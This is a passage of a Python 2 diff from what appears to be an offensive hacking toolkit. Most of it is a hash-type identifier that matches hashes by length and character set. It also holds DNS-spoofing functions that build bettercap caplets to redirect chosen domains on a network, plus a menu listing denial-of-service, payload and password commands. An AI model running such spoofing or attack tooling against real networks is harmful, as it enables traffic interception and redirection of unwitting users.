hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] + except: + print "\n" +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("\033[1mhit enter to stop server:\033[0m ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") + +def terminal(): + os.system("gnome-terminal") + +def dnsspoof(): + target = raw_input("\033[1mTarget:\033[0m ") + domain1 = raw_input("\033[1mDomain1:\033[0m ") + domain2 = raw_input("\033[1mDomain2:\033[0m ") + os.system('echo "net.sniff on\n" >> dns.cap') + os.system('echo "set dns.spoof.domains {0},{1}\n" >> dns.cap'.format(domain1,domain2)) + os.system('echo "set dns.spoof.address {0}\n" >> dns.cap'.format(target)) + os.system('echo "dns.spoof on\n" >> dns.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet dns.cap") + os.system("rm dns.cap") + +def dnsspoofall(): + domain1 = raw_input("\033[1mDomain1:\033[0m ") + domain2 = raw_input("\033[1mDomain2:\033[0m ") + os.system('echo "net.sniff on\n" >> dnsall.cap') + os.system('echo "set dns.spoof.domains {0},{1}\n" >> dnsall.cap'.format(domain1,domain2)) + os.system('echo "set dns.spoof.all true\n" >> dnsall.cap') + os.system('echo "dns.spoof on\n" >> dnsall.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet dnsall.cap") + os.system("rm dnsall.cap") + +def main(): + found = False + while not found: + try: + x = raw_input('\033[0mHTK{0}{1}\033[0mLite: '.format(random.choice(colorlist), random.choice(inputlist))) + + if x == "clear": + os.system("clear") + if x == "exit": + print "\nfollow @tuf_unkn0wn on instagram" + print "\nExiting..." + break + os.system("service tor stop") + os.system("service postgresql stop") + sys.exit() + + if x == "banner": + mainbanner() + if x == "?": + helpbanner() + if x == "infoscan": + infoscan() + if x == "infoscan -o": + specscan() + if x == "dos": + dos() + if x == "payload": + payload() + if x == "password": + password() + if x == "reboot": + reboot() + if x == "monitor on": + monitoron() + if x == "monitor off": + monitoroff() + if x == "command": + command() + if x == "anon on": + anonon() + if x == "anon off": + anonoff() + if x == "sysinfo": + 